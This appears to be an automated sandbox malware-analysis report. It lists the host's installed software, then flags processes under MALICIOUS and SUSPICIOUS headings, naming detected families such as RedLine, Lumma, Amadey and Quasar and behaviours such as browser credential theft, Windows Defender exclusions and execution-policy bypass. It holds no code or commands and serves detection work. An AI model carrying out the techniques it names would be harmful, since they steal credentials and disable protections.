Microsoft Office Word MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Word MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office X MUI (French) 2010 (14.0.4763.1000)
Microsoft Office X MUI (French) 2010 (14.0.4763.1000)
Microsoft Office X MUI (German) 2010 (14.0.4763.1000)
Microsoft Office X MUI (German) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office X MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x86 en-US) (115.0.2)
Mozilla Firefox (x86 en-US) (115.0.2)
Mozilla Maintenance Service (115.0.2)
Mozilla Maintenance Service (115.0.2)
Notepad++ (32-bit x86) (7.9.1)
Notepad++ (32-bit x86) (7.9.1)
PowerShell 7-x86 (7.2.11.0)
PowerShell 7-x86 (7.2.11.0)
Skype version 8.110 (8.110)
Skype version 8.110 (8.110)
Update for Microsoft .NET Framework 4.8 (KB4503575) (1)
Update for Microsoft .NET Framework 4.8 (KB4503575) (1)
VLC media player (3.0.11)
VLC media player (3.0.11)
WinRAR 5.91 (32-bit) (5.91.0)
WinRAR 5.91 (32-bit) (5.91.0)

Add for printing

MALICIOUS
- HAUSBOMBER has been detected (YARA)
  - 4363463463464363463463463.bin.exe (PID: 2064)
  - 4363463463464363463463463.bin.exe (PID: 1844)
  - 4363463463464363463463463.bin.exe (PID: 2596)
  - 4363463463464363463463463.bin.exe (PID: 3168)
  - 4363463463464363463463463.bin.exe (PID: 1816)
  - 4363463463464363463463463.bin.exe (PID: 3076)
  - 4363463463464363463463463.bin.exe (PID: 452)
  - 4363463463464363463463463.bin.exe (PID: 2524)
  - 4363463463464363463463463.bin.exe (PID: 1028)
- Changes the login/logoff helper path in the registry
  - Wattyl.exe (PID: 3244)
  - _VTI_CNF.exe (PID: 4320)
- Creates a writable file in the system directory
  - Wattyl.exe (PID: 3244)
  - Temp3.exe (PID: 5260)
  - 11.exe (PID: 4360)
- MARSSTEALER has been detected (YARA)
  - 4363463463464363463463463.bin.exe (PID: 2596)
  - data64_1.exe (PID: 3236)
- Create files in the Startup directory
  - Amdau.exe (PID: 3628)
  - flesh.exe (PID: 4404)
  - NINJA.exe (PID: 5000)
- Actions looks like stealing of personal data
  - stub.exe (PID: 3960)
  - stub.exe (PID: 2040)
  - twty.exe (PID: 3656)
  - AppLaunch.exe (PID: 6108)
  - flesh.exe (PID: 4404)
  - cmd.exe (PID: 3372)
  - RegAsm.exe (PID: 4256)
  - crypted.exe (PID: 5456)
  - dialer.exe (PID: 4124)
- Uses sleep, probably for evasion detection (SCRIPT)
  - wscript.exe (PID: 3700)
  - wscript.exe (PID: 5396)
  - wscript.exe (PID: 5120)
- Adds path to the Windows Defender exclusion list
  - savesinto.exe (PID: 2988)
  - WinScp.exe (PID: 4376)
  - WinDir.exe (PID: 7408)
  - more.exe (PID: 4220)
  - svchost.com (PID: 6568)
  - Archevod_XWorm.exe (PID: 2644)
  - svchost.com (PID: 7336)
  - svchost.com (PID: 4904)
  - fd432592b959b22401bce262763b192065a90e3f.exe (PID: 6184)
- Detected an obfuscated command line used with Guloader
  - powershell.exe (PID: 5680)
- REDLINE has been detected (YARA)
  - ms_updater.exe (PID: 696)
  - v2.exe (PID: 3060)
  - RegSvcs.exe (PID: 5852)
  - build.exe (PID: 1424)
  - RegAsm.exe (PID: 6476)
  - tungbot.exe (PID: 3536)
- Steals credentials from Web Browsers
  - AppLaunch.exe (PID: 6108)
  - flesh.exe (PID: 4404)
  - RegAsm.exe (PID: 4256)
- Changes appearance of the Explorer extensions
  - explorer.exe (PID: 5180)
  - svchost.exe (PID: 5044)
- Changes the autorun value in the registry
  - svchost.exe (PID: 5044)
  - _VTI_CNF.exe (PID: 4320)
  - WinDir.exe (PID: 7408)
- Uses Task Scheduler to run other applications
  - svchost.exe (PID: 5044)
  - svchost.com (PID: 4520)
  - svchost.com (PID: 4536)
  - cmd.exe (PID: 6044)
  - svchost.com (PID: 6956)
  - svchost.com (PID: 5344)
- Checks whether a specified folder exists (SCRIPT)
  - 7zipFOPBACKEND.exe (PID: 4364)
- Uses Task Scheduler to autorun other applications
  - Temp3.exe (PID: 5260)
  - Windows Security Client.exe (PID: 5356)
  - cmd.exe (PID: 6668)
- Modify registry editing tools (regedit)
  - _VTI_CNF.exe (PID: 4320)
- Task Manager has been disabled (taskmgr)
  - _VTI_CNF.exe (PID: 4320)
- ARKEI has been detected (YARA)
  - data64_1.exe (PID: 3236)
- AMADEY has been detected (YARA)
  - jsc.exe (PID: 2616)
- METASTEALER has been detected (YARA)
  - RegSvcs.exe (PID: 1864)
- RISEPRO has been detected (YARA)
  - rise.exe (PID: 3240)
- Deletes a file (SCRIPT)
  - wscript.exe (PID: 5120)
- QUASAR has been detected (YARA)
  - Windows Security Client.exe (PID: 5356)
- LUMMA has been detected (YARA)
  - crypted.exe (PID: 5456)
  - AppLaunch.exe (PID: 5404)
- HIJACKLOADER has been detected (YARA)
  - svchost.exe (PID: 2848)
- Bypass execution policy to execute commands
  - powershell.exe (PID: 7596)
  - powershell.exe (PID: 3836)
  - powershell.exe (PID: 6768)
  - powershell.exe (PID: 7912)
  - powershell.exe (PID: 7276)
- Changes powershell execution policy (Bypass)
  - svchost.com (PID: 7336)
  - svchost.com (PID: 4904)
  - svchost.com (PID: 6368)
  - svchost.com (PID: 7624)
  - msiexec.exe (PID: 6380)
- Adds process to the Windows Defender exclusion list
  - Archevod_XWorm.exe (PID: 2644)
  - svchost.com (PID: 7624)
  - svchost.com (PID: 6368)
- Starts CMD.EXE for self-deleting
  - srr.exe (PID: 7952)
SUSPICIOUS
- Reads the Internet Settings
  - 4363463463464363463463463.bin.exe (PID: 1816)
  - 4363463463464363463463463.bin.exe (PID: 2064)
  - 4363463463464363463463463.bin.exe (PID: 1844)
  - 4363463463464363463463463.bin.exe (PID: 2596)
  - 4363463463464363463463463.bin.exe (PID: 452)
  - 4363463463464363463463463.bin.exe (PID: 2524)
  - 4363463463464363463463463.bin.exe (PID: 3076)
  - 4363463463464363463463463.bin.exe (PID: 1028)
  - 4363463463464363463463463.bin.exe (PID: 3168)
  - Wattyl.exe (PID: 3244)
  - data64_5.exe (PID: 3644)
  - RegAsm.exe (PID: 1924)
  - data64_1.exe (PID: 3236)
  - npp.exe (PID: 2260)
  - jsc.exe (PID: 2616)
  - stub.exe (PID: 3960)
  - stub.exe (PID: 2040)
  - stub.exe (PID: 1632)
  - stub.exe (PID: 3636)
  - stub.exe (PID: 2204)
  - stub.exe (PID: 3380)
  - stub.exe (PID: 392)
  - stub.exe (PID: 864)
  - stub.exe (PID: 3388)
  - stub.exe (PID: 2760)
  - stub.exe (PID: 2836)
  - stub.exe (PID: 3196)
  - stub.exe (PID: 3508)
  - stub.exe (PID: 2776)
  - stub.exe (PID: 2756)
  - stub.exe (PID: 2488)
  - stub.exe (PID: 2948)
  - stub.exe (PID: 2044)
  - stub.exe (PID: 3204)
  - stub.exe (PID: 2076)
  - stub.exe (PID: 3560)
  - stub.exe (PID: 1216)
  - stub.exe (PID: 3640)
  - stub.exe (PID: 3896)
  - stub.exe (PID: 2564)
  - stub.exe (PID: 2000)
  - stub.exe (PID: 680)
  - stub.exe (PID: 2796)
  - stub.exe (PID: 2832)
  - stub.exe (PID: 3372)
  - stub.exe (PID: 3364)
  - stub.exe (PID: 1268)
  - stub.exe (PID: 3484)
  - stub.exe (PID: 3292)
  - stub.exe (PID: 1196)
  - stub.exe (PID: 3864)
  - stub.exe (PID: 2160)
  - stub.exe (PID: 1632)
  - stub.exe (PID: 764)
  - stub.exe (PID: 584)
  - stub.exe (PID: 3816)
  - stub.exe (PID: 3288)
  - stub.exe (PID: 3624)
  - stub.exe (PID: 2852)
  - stub.exe (PID: 712)
  - stub.exe (PID: 3120)
  - stub.exe (PID: 1936)
  - stub.exe (PID: 3132)
  - stub.exe (PID: 3148)
  - stub.exe (PID: 3872)
  - stub.exe (PID: 2488)
  - stub.exe (PID: 2476)
  - stub.exe (PID: 3484)
  - stub.exe (PID: 3544)
  - stub.exe (PID: 124)
  - stub.exe (PID: 116)
  - stub.exe (PID: 3520)
  - stub.exe (PID: 1836)
  - stub.exe (PID: 764)
  - stub.exe (PID: 1596)
  - stub.exe (PID: 3640)
  - stub.exe (PID: 3900)
  - stub.exe (PID: 2688)
  - stub.exe (PID: 2576)
  - stub.exe (PID: 2796)
  - stub.exe (PID: 2812)
  - stub.exe (PID: 2988)
  - stub.exe (PID: 984)
  - stub.exe (PID: 3056)
  - stub.exe (PID: 2324)
  - stub.exe (PID: 2916)
  - stub.exe (PID: 2792)
  - stub.exe (PID: 2948)
  - stub.exe (PID: 1876)
  - stub.exe (PID: 3528)
  - stub.exe (PID: 584)
  - stub.exe (PID: 1344)
  - stub.exe (PID: 1924)
  - stub.exe (PID: 1864)
  - stub.exe (PID: 4036)
  - stub.exe (PID: 3444)
  - stub.exe (PID: 1892)
  - stub.exe (PID: 1936)
  - stub.exe (PID: 1808)
  - stub.exe (PID: 3044)
  - stub.exe (PID: 2988)
  - stub.exe (PID: 3364)
  - stub.exe (PID: 2804)
  - stub.exe (PID: 3084)
  - stub.exe (PID: 1812)
  - stub.exe (PID: 3100)
  - stub.exe (PID: 3632)
  - stub.exe (PID: 1548)
  - stub.exe (PID: 3004)
  - stub.exe (PID: 1904)
  - stub.exe (PID: 1404)
  - stub.exe (PID: 2044)
  - stub.exe (PID: 3840)
  - stub.exe (PID: 1780)
  - stub.exe (PID: 3900)
  - stub.exe (PID: 3444)
  - stub.exe (PID: 764)
  - stub.exe (PID: 392)
  - stub.exe (PID: 2576)
  - stub.exe (PID: 2056)
  - stub.exe (PID: 2108)
  - stub.exe (PID: 3196)
  - stub.exe (PID: 2912)
  - stub.exe (PID: 2176)
  - stub.exe (PID: 3056)
  - stub.exe (PID: 2324)
  - stub.exe (PID: 3156)
  - stub.exe (PID: 3432)
  - stub.exe (PID: 1560)
  - stub.exe (PID: 124)
  - stub.exe (PID: 3660)
  - stub.exe (PID: 1860)
  - stub.exe (PID: 3704)
  - stub.exe (PID: 3636)
  - stub.exe (PID: 1316)
  - stub.exe (PID: 3816)
  - stub.exe (PID: 2592)
  - stub.exe (PID: 2740)
  - stub.exe (PID: 2928)
  - stub.exe (PID: 680)
  - stub.exe (PID: 4004)
  - stub.exe (PID: 3064)
  - stub.exe (PID: 2812)
  - stub.exe (PID: 2804)
  - stub.exe (PID: 3124)
  - stub.exe (PID: 3508)
  - stub.exe (PID: 3468)
  - stub.exe (PID: 2324)
  - stub.exe (PID: 2260)
  - stub.exe (PID: 1560)
  - stub.exe (PID: 2480)
  - stub.exe (PID: 3528)
  - stub.exe (PID: 3520)
  - stub.exe (PID: 2088)
  - stub.exe (PID: 3736)
  - stub.exe (PID: 1236)
  - stub.exe (PID: 3764)
  - stub.exe (PID: 3964)
  - stub.exe (PID: 1892)
  - stub.exe (PID: 2504)
  - stub.exe (PID: 392)
  - stub.exe (PID: 884)
  - stub.exe (PID: 3364)
  - stub.exe (PID: 2760)
  - stub.exe (PID: 3140)
  - stub.exe (PID: 900)
  - stub.exe (PID: 3088)
  - stub.exe (PID: 3292)
  - stub.exe (PID: 2176)
  - stub.exe (PID: 3308)
  - stub.exe (PID: 1632)
  - stub.exe (PID: 3544)
  - stub.exe (PID: 1780)
  - stub.exe (PID: 1772)
  - stub.exe (PID: 1596)
  - stub.exe (PID: 864)
  - stub.exe (PID: 1216)
  - stub.exe (PID: 2744)
  - stub.exe (PID: 3552)
  - stub.exe (PID: 2988)
  - stub.exe (PID: 2836)
  - stub.exe (PID: 3136)
  - stub.exe (PID: 3492)
  - stub.exe (PID: 3872)
  - stub.exe (PID: 2320)
  - stub.exe (PID: 3100)
  - stub.exe (PID: 2296)
  - stub.exe (PID: 2488)
  - stub.exe (PID: 3404)
  - stub.exe (PID: 2448)
  - plink.exe (PID: 4036)
  - stub.exe (PID: 3520)
  - stub.exe (PID: 3596)
  - stub.exe (PID: 2788)
  - stub.exe (PID: 3044)
  - stub.exe (PID: 3068)
  - stub.exe (PID: 3640)
  - stub.exe (PID: 2776)
  - stub.exe (PID: 2796)
  - stub.exe (PID: 3064)
  - stub.exe (PID: 3196)
  - stub.exe (PID: 900)
  - stub.exe (PID: 3872)
  - stub.exe (PID: 572)
  - stub.exe (PID: 1196)
  - stub.exe (PID: 3088)
  - stub.exe (PID: 2260)
  - stub.exe (PID: 3004)
  - stub.exe (PID: 3432)
  - stub.exe (PID: 2068)
  - stub.exe (PID: 2080)
  - stub.exe (PID: 3764)
  - stub.exe (PID: 3536)
  - stub.exe (PID: 3964)
  - stub.exe (PID: 3788)
  - stub.exe (PID: 2788)
  - stub.exe (PID: 2504)
  - stub.exe (PID: 712)
  - stub.exe (PID: 2740)
  - stub.exe (PID: 2776)
  - stub.exe (PID: 2812)
  - stub.exe (PID: 3492)
  - stub.exe (PID: 2176)
  - stub.exe (PID: 3196)
  - stub.exe (PID: 3812)
  - stub.exe (PID: 3872)
  - stub.exe (PID: 3432)
  - stub.exe (PID: 2792)
  - stub.exe (PID: 3468)
  - stub.exe (PID: 1772)
  - stub.exe (PID: 3544)
  - stub.exe (PID: 3308)
  - stub.exe (PID: 1216)
  - stub.exe (PID: 2080)
  - stub.exe (PID: 548)
  - stub.exe (PID: 1820)
  - stub.exe (PID: 1584)
  - stub.exe (PID: 3368)
  - stub.exe (PID: 1924)
  - stub.exe (PID: 3132)
  - stub.exe (PID: 2912)
  - stub.exe (PID: 3632)
  - stub.exe (PID: 2360)
  - stub.exe (PID: 4048)
  - twty.exe (PID: 3656)
  - route.exe (PID: 2928)
  - wscript.exe (PID: 3700)
  - powershell.exe (PID: 2832)
  - powershell.exe (PID: 1644)
  - savesinto.exe (PID: 2988)
  - powershell.exe (PID: 900)
  - powershell.exe (PID: 3764)
  - taskeng.exe (PID: 3068)
  - powershell.exe (PID: 2592)
  - powershell.exe (PID: 2916)
  - powershell.exe (PID: 3812)
  - powershell.exe (PID: 1316)
  - powershell.exe (PID: 2636)
  - powershell.exe (PID: 3644)
  - powershell.exe (PID: 1216)
  - powershell.exe (PID: 4036)
  - powershell.exe (PID: 3964)
  - powershell.exe (PID: 3388)
  - wlanext.exe (PID: 5216)
  - 360TS_Setup_Mini_WW.Marketator.CPI20230401_6.6.0.1054.exe (PID: 5776)
  - PCclear_Eng_mini.exe (PID: 3444)
  - InstallSetup9.exe (PID: 5916)
  - AppLaunch.exe (PID: 6108)
  - tungbot.exe (PID: 3536)
  - Financials-05-16-23-PDF.exe (PID: 4760)
  - build.exe (PID: 1424)
  - clip.exe (PID: 4224)
  - NBYS%20ASM.NET.exe (PID: 4616)
  - peinf.exe (PID: 5420)
  - Setup2010u32.exe (PID: 5136)
  - LEAJ.exe (PID: 4820)
  - pp.exe (PID: 3892)
  - Temp3.exe (PID: 5260)
  - PsExec.exe (PID: 4576)
  - Windows Security Client.exe (PID: 5356)
  - Update.exe (PID: 4312)
  - WinLocker.exe (PID: 6016)
  - cp.exe (PID: 1904)
  - _VTI_CNF.exe (PID: 4320)
  - flesh.exe (PID: 4404)
  - AdobeUpdateres.exe (PID: 3716)
  - wab.exe (PID: 4136)
  - ghjkl.exe (PID: 2984)
  - WinScp.exe (PID: 4376)
  - POWERSHELL.exe (PID: 5772)
  - pei.exe (PID: 4064)
  - RegAsm.exe (PID: 4256)
  - KB824105-x86-ENU.exe (PID: 2960)
  - powershell.exe (PID: 2384)
  - 11.exe (PID: 4360)
  - AppLaunch.exe (PID: 5404)
  - more.exe (PID: 4220)
  - TaAgente.exe (PID: 3644)
  - 360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe (PID: 6372)
  - tpeinf.exe (PID: 6644)
  - nszDC12.tmp (PID: 5452)
  - NXYBankAssist.exe (PID: 3928)
  - buding.exe (PID: 4532)
  - }uqUir9@J.exe (PID: 7092)
  - pcidevicechecker.exe (PID: 1264)
  - WinDir.exe (PID: 7408)
  - POWERSHELL.exe (PID: 7432)
- Adds/modifies Windows certificates
  - 4363463463464363463463463.bin.exe (PID: 2064)
  - 4363463463464363463463463.bin.exe (PID: 2596)
  - 4363463463464363463463463.bin.exe (PID: 2524)
  - 4363463463464363463463463.bin.exe (PID: 3076)
- Reads settings of System Certificates
  - 4363463463464363463463463.bin.exe (PID: 1844)
  - 4363463463464363463463463.bin.exe (PID: 452)
  - 4363463463464363463463463.bin.exe (PID: 2596)
  - 4363463463464363463463463.bin.exe (PID: 2524)
  - 4363463463464363463463463.bin.exe (PID: 3076)
  - 4363463463464363463463463.bin.exe (PID: 1028)
  - 4363463463464363463463463.bin.exe (PID: 3168)
  - 4363463463464363463463463.bin.exe (PID: 2064)
  - 4363463463464363463463463.bin.exe (PID: 1816)
  - AppLaunch.exe (PID: 6108)
  - Financials-05-16-23-PDF.exe (PID: 4760)
  - Update.exe (PID: 4312)
  - RegAsm.exe (PID: 4256)
  - 360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe (PID: 6372)
  - InstallSetup9.exe (PID: 5916)
- The process creates files with name similar to system file names
  - Wattyl.exe (PID: 3244)
  - 4363463463464363463463463.bin.exe (PID: 2064)
  - stub.exe (PID: 3284)
  - 4363463463464363463463463.bin.exe (PID: 1816)
  - savesinto.exe (PID: 2988)
  - icsys.icn.exe (PID: 3308)
  - spoolsv.exe (PID: 5204)
  - svchost.exe (PID: 5044)
  - PluginFlash.exe (PID: 5296)
  - NINJA.exe (PID: 5000)
- Starts CMD.EXE for commands execution
  - Wattyl.exe (PID: 3244)
  - wscript.exe (PID: 3700)
  - clip.exe (PID: 4224)
  - WinLocker.exe (PID: 6016)
  - cp.exe (PID: 1904)
  - _VTI_CNF.exe (PID: 4320)
  - NINJA.exe (PID: 5000)
  - KB824105-x86-ENU.exe (PID: 2960)
  - hvthvjgfr6tyghgdtrtyigkhvjggft.exe (PID: 7800)
  - more.exe (PID: 6716)
  - svchost.com (PID: 8096)
  - fd432592b959b22401bce262763b192065a90e3f.exe (PID: 6184)
  - wscript.exe (PID: 6348)
  - wscript.exe (PID: 7240)
  - srr.exe (PID: 7952)
  - conhost.exe (PID: 2072)
  - wscript.exe (PID: 9356)
- Creates or modifies Windows services
  - Wattyl.exe (PID: 3244)
  - _VTI_CNF.exe (PID: 4320)
- Reads the Windows owner or organization settings
  - is-SSOM8.tmp (PID: 3796)
  - is-M2AQP.tmp (PID: 2920)
  - is-6NB4B.tmp (PID: 2844)
  - is-OUPR4.tmp (PID: 1656)
  - Setup2010u32.exe (PID: 5136)
  - is-4O8IH.tmp (PID: 2968)
  - 11.exe (PID: 4360)
- Searches for installed software
  - is-M2AQP.tmp (PID: 2920)
  - is-6NB4B.tmp (PID: 2844)
  - is-OUPR4.tmp (PID: 1656)
  - AppLaunch.exe (PID: 6108)
  - flesh.exe (PID: 4404)
  - is-4O8IH.tmp (PID: 2968)
  - RegAsm.exe (PID: 4256)
  - dialer.exe (PID: 4124)
- Starts application with an unusual extension
  - stub.exe (PID: 2040)
  - stub.exe (PID: 1632)
  - 4363463463464363463463463.bin.exe (PID: 3168)
  - stub.exe (PID: 3636)
  - stub.exe (PID: 2204)
  - stub.exe (PID: 3380)
  - stub.exe (PID: 3388)
  - stub.exe (PID: 392)
  - stub.exe (PID: 864)
  - stub.exe (PID: 2760)
  - stub.exe (PID: 2836)
  - stub.exe (PID: 3196)
  - stub.exe (PID: 3508)
  - stub.exe (PID: 2776)
  - stub.exe (PID: 2488)
  - stub.exe (PID: 2948)
  - stub.exe (PID: 2756)
  - stub.exe (PID: 3204)
  - stub.exe (PID: 2044)
  - stub.exe (PID: 2076)
  - stub.exe (PID: 3560)
  - stub.exe (PID: 3896)
  - stub.exe (PID: 3640)
  - stub.exe (PID: 1216)
  - stub.exe (PID: 2000)
  - stub.exe (PID: 680)
  - stub.exe (PID: 2564)
  - stub.exe (PID: 2796)
  - stub.exe (PID: 2832)
  - stub.exe (PID: 3364)
  - stub.exe (PID: 1268)
  - stub.exe (PID: 3372)
  - stub.exe (PID: 3484)
  - stub.exe (PID: 3292)
  - stub.exe (PID: 1196)
  - stub.exe (PID: 3864)
  - stub.exe (PID: 2160)
  - stub.exe (PID: 584)
  - stub.exe (PID: 1632)
  - stub.exe (PID: 764)
  - stub.exe (PID: 3624)
  - stub.exe (PID: 3816)
  - stub.exe (PID: 3288)
  - 4363463463464363463463463.bin.exe (PID: 1816)
  - stub.exe (PID: 2852)
  - stub.exe (PID: 3120)
  - stub.exe (PID: 712)
  - stub.exe (PID: 1936)
  - stub.exe (PID: 3132)
  - stub.exe (PID: 3148)
  - stub.exe (PID: 3872)
  - stub.exe (PID: 2488)
  - stub.exe (PID: 2476)
  - stub.exe (PID: 3484)
  - stub.exe (PID: 3544)
  - stub.exe (PID: 116)
  - stub.exe (PID: 3520)
  - stub.exe (PID: 124)
  - stub.exe (PID: 1836)
  - stub.exe (PID: 764)
  - stub.exe (PID: 3900)
  - stub.exe (PID: 3640)
  - stub.exe (PID: 1596)
  - stub.exe (PID: 2688)
  - stub.exe (PID: 2576)
  - stub.exe (PID: 2988)
  - stub.exe (PID: 2796)
  - stub.exe (PID: 3056)
  - stub.exe (PID: 984)
  - stub.exe (PID: 2812)
  - stub.exe (PID: 2324)
  - stub.exe (PID: 2916)
  - stub.exe (PID: 2792)
  - stub.exe (PID: 2948)
  - stub.exe (PID: 1876)
  - stub.exe (PID: 584)
  - stub.exe (PID: 1344)
  - stub.exe (PID: 3528)
  - stub.exe (PID: 4036)
  - stub.exe (PID: 1864)
  - stub.exe (PID: 3444)
  - stub.exe (PID: 1892)
  - stub.exe (PID: 1924)
  - stub.exe (PID: 1808)
  - stub.exe (PID: 3044)
  - stub.exe (PID: 1936)
  - stub.exe (PID: 3364)
  - stub.exe (PID: 3084)
  - stub.exe (PID: 2988)
  - stub.exe (PID: 2804)
  - stub.exe (PID: 3632)
  - stub.exe (PID: 1812)
  - stub.exe (PID: 3100)
  - stub.exe (PID: 3004)
  - stub.exe (PID: 1548)
  - stub.exe (PID: 1404)
  - stub.exe (PID: 1904)
  - stub.exe (PID: 1780)
  - stub.exe (PID: 3840)
  - stub.exe (PID: 2044)
  - stub.exe (PID: 3900)
  - stub.exe (PID: 3444)
  - stub.exe (PID: 764)
  - stub.exe (PID: 392)
  - stub.exe (PID: 2576)
  - stub.exe (PID: 2056)
  - stub.exe (PID: 2108)
  - stub.exe (PID: 2912)
  - stub.exe (PID: 3196)
  - stub.exe (PID: 3056)
  - stub.exe (PID: 3156)
  - stub.exe (PID: 2176)
  - stub.exe (PID: 2324)
  - stub.exe (PID: 1560)
  - stub.exe (PID: 3432)
  - stub.exe (PID: 124)
  - stub.exe (PID: 3660)
  - stub.exe (PID: 1860)
  - stub.exe (PID: 3636)
  - stub.exe (PID: 3704)
  - stub.exe (PID: 1316)
  - stub.exe (PID: 3816)
  - stub.exe (PID: 2592)
  - stub.exe (PID: 2740)
  - stub.exe (PID: 2928)
  - stub.exe (PID: 680)
  - stub.exe (PID: 4004)
  - stub.exe (PID: 3064)
  - stub.exe (PID: 2812)
  - stub.exe (PID: 3508)
  - stub.exe (PID: 2804)
  - stub.exe (PID: 3124)
  - stub.exe (PID: 2324)
  - stub.exe (PID: 3468)
  - stub.exe (PID: 2260)
  - stub.exe (PID: 1560)
  - stub.exe (PID: 2480)
  - stub.exe (PID: 3528)
  - stub.exe (PID: 3520)
  - stub.exe (PID: 2088)
  - stub.exe (PID: 3764)
  - stub.exe (PID: 3736)
  - stub.exe (PID: 1236)
  - stub.exe (PID: 3964)
  - stub.exe (PID: 1892)
  - stub.exe (PID: 392)
  - stub.exe (PID: 2760)
  - stub.exe (PID: 2504)
  - stub.exe (PID: 884)
  - stub.exe (PID: 3364)
  - stub.exe (PID: 3140)
  - stub.exe (PID: 900)
  - stub.exe (PID: 2176)
  - stub.exe (PID: 3088)
  - stub.exe (PID: 3292)
  - stub.exe (PID: 3544)
  - stub.exe (PID: 3308)
  - stub.exe (PID: 1772)
  - stub.exe (PID: 1632)
  - stub.exe (PID: 1780)
  - stub.exe (PID: 1596)
  - stub.exe (PID: 864)
  - stub.exe (PID: 1216)
  - stub.exe (PID: 3552)
  - stub.exe (PID: 2744)
  - stub.exe (PID: 2988)
  - stub.exe (PID: 2836)
  - stub.exe (PID: 3492)
  - stub.exe (PID: 3872)
  - stub.exe (PID: 3136)
  - stub.exe (PID: 2320)
  - stub.exe (PID: 3100)
  - stub.exe (PID: 2296)
  - stub.exe (PID: 2488)
  - stub.exe (PID: 3404)
  - stub.exe (PID: 2448)
  - stub.exe (PID: 3596)
  - stub.exe (PID: 3640)
  - stub.exe (PID: 3520)
  - stub.exe (PID: 2788)
  - stub.exe (PID: 3044)
  - stub.exe (PID: 3068)
  - stub.exe (PID: 2776)
  - stub.exe (PID: 2796)
  - stub.exe (PID: 3064)
  - stub.exe (PID: 3196)
  - stub.exe (PID: 900)
  - stub.exe (PID: 3872)
  - stub.exe (PID: 572)
  - stub.exe (PID: 1196)
  - stub.exe (PID: 3088)
  - stub.exe (PID: 3432)
  - stub.exe (PID: 2260)
  - stub.exe (PID: 2068)
  - stub.exe (PID: 2080)
  - stub.exe (PID: 3004)
  - stub.exe (PID: 3764)
  - stub.exe (PID: 3536)
  - stub.exe (PID: 3788)
  - stub.exe (PID: 2788)
  - stub.exe (PID: 3964)
  - stub.exe (PID: 2740)
  - stub.exe (PID: 2504)
  - stub.exe (PID: 712)
  - stub.exe (PID: 2776)
  - stub.exe (PID: 2812)
  - stub.exe (PID: 3196)
  - stub.exe (PID: 3492)
  - stub.exe (PID: 2176)
  - stub.exe (PID: 3872)
  - stub.exe (PID: 3812)
  - stub.exe (PID: 3432)
  - stub.exe (PID: 2792)
  - stub.exe (PID: 3468)
  - stub.exe (PID: 3544)
  - stub.exe (PID: 1772)
  - stub.exe (PID: 3308)
  - stub.exe (PID: 1216)
  - stub.exe (PID: 2080)
  - stub.exe (PID: 1820)
  - stub.exe (PID: 1924)
  - stub.exe (PID: 548)
  - stub.exe (PID: 1584)
  - stub.exe (PID: 3368)
  - stub.exe (PID: 3132)
  - stub.exe (PID: 2912)
  - stub.exe (PID: 4048)
  - stub.exe (PID: 3632)
  - stub.exe (PID: 2360)
  - 4363463463464363463463463.bin.exe (PID: 3076)
  - 4363463463464363463463463.bin.exe (PID: 452)
  - 4363463463464363463463463.bin.exe (PID: 2524)
  - wlanext.exe (PID: 5216)
  - 4363463463464363463463463.bin.exe (PID: 2596)
  - 4363463463464363463463463.bin.exe (PID: 1028)
  - tungbot.exe (PID: 3164)
  - LEAJ.exe (PID: 4820)
  - 4363463463464363463463463.bin.exe (PID: 2064)
  - flesh.exe (PID: 4404)
  - AdobeUpdateres.exe (PID: 3716)
  - iexplore.exe (PID: 2324)
  - 4363463463464363463463463.bin.exe (PID: 1844)
  - ghjkl.exe (PID: 2984)
  - InstallSetup9.exe (PID: 5916)
  - more.exe (PID: 4220)
  - latestbuild.exe (PID: 3900)
  - newbuild.exe (PID: 6072)
